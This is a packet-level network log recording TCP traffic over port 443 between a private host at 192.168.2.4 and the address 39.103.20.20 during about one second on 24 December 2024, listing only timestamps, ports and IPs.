Dec 24, 2024 15:12:31.803493977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.808293104 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.808374882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.817895889 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.817984104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.827486038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.827585936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.832361937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.832437992 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.841967106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.842050076 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.851154089 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.851275921 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.860815048 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.860888958 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.868372917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.868453979 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.874152899 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.874213934 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.884507895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.884584904 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.896573067 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.896677017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.903388977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.903462887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.916007996 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.916122913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.921817064 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.921902895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.936762094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.936863899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.940691948 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.940757036 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.946945906 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.947010040 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.959605932 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.959683895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.965940952 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.966026068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.978080034 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.978168964 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.985356092 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.985435963 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:31.992117882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:31.992180109 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.002603054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.002665043 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.008651018 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.008712053 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.019409895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.019479990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.026288033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.026381969 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.029989004 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.030055046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.040234089 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.040330887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.044470072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.044529915 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.054997921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.055067062 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.060254097 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.060319901 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.069123030 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.069180012 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.074070930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.074136019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.079499960 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.079567909 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.088011980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.088072062 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.092674971 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.092744112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.103693962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.103755951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.107695103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.107784986 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.114696026 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.114768982 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.120055914 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.120120049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.126162052 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.126223087 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.133193970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.133255959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.136288881 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.136347055 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.141321898 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.141407967 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.150614977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.150687933 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.153551102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.153605938 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.160851955 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.160923958 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.164000034 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.164062023 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.170916080 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.170979977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.174827099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.174875021 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.177881956 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.177947044 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.182785988 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.182857990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.186247110 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.186305046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.192290068 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.192352057 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.195899010 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.195955992 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.201293945 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.201365948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.207494020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.207566977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.215689898 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.215774059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.217609882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.217686892 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.226296902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.226421118 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.227997065 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.228064060 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.242407084 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.242583990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.255553961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.255642891 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.256232023 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.256289005 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.266175985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.266244888 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.266712904 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.266763926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.281371117 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.281440973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.282226086 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.282279015 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.294996023 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.295066118 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.295528889 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.295583963 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.309051991 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.309149027 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.309729099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.309778929 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.318185091 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.318238020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.318691015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.318736076 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.328349113 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.328418016 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.328947067 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.329005003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.341067076 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.341142893 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.341675043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.341741085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.352437019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.352508068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.353523016 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.353586912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.362139940 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.362215996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.362840891 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.362895966 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.368532896 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.368582010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.369041920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.369093895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.378801107 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.378855944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.379448891 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.379492998 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.387516975 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.387582064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.388158083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.388216972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.398191929 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.398243904 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.399473906 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.399523020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.408058882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.408126116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.409251928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.409312963 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.433722019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.433792114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.434834003 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.434891939 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.444293022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.444351912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.445410013 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.445461988 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.458178997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.458240986 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.459280968 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.459342003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.473145008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.473213911 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.473634958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.473691940 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.487097979 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.487286091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.487801075 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.487863064 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.501060963 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.501128912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.501761913 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.501811981 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.510373116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.510433912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.511389971 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.511449099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.522418022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.522504091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.523741007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.523801088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.535619974 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.535799980 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.536814928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.536974907 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.548255920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.548317909 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.549488068 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.549551010 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.558243990 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.558331966 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.559019089 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.559083939 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.561683893 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.561745882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.562807083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.562865019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.570856094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.570915937 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.571962118 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.572015047 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.580144882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.580233097 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.581157923 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.581495047 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.592736959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.592816114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.593894958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.593974113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.602030039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.602089882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.603801012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.603878021 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.626517057 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.626677036 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.627291918 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.627469063 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.637254953 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.637356043 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.638381004 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.638449907 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.650847912 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.650934935 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.651679039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.651846886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.665621042 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.665811062 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.667355061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.667438984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.680044889 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.680119038 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.681191921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.681265116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.693705082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.693869114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.698246956 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.698316097 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.706800938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.706873894 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.707751036 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.707804918 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.716914892 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.716989994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.718852997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.718904018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.729690075 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.729855061 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.731514931 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.731574059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.742805958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.742973089 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.744200945 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.744260073 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.749631882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.749701977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.750940084 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.750997066 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.754380941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.754462004 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.756237984 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.756298065 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.763695002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.763761044 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.764925957 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.765007019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.774645090 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.774718046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.775789976 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.775944948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.791491985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.791555882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.792373896 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.792428970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.794380903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.794440031 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.796147108 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.796195984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.818558931 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.818625927 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.819715977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.819772959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.830148935 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.830271006 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.831923008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.831979990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.843830109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.843889952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.845288038 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.845345020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.857907057 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.857965946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.859226942 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.859296083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.873018980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.873122931 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.874103069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.874269962 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.886014938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.886183977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.886960983 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.887016058 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.895030975 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:32.895082951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:32.896559954 CET	443	49740	39.103.20.20	192.168.2.4
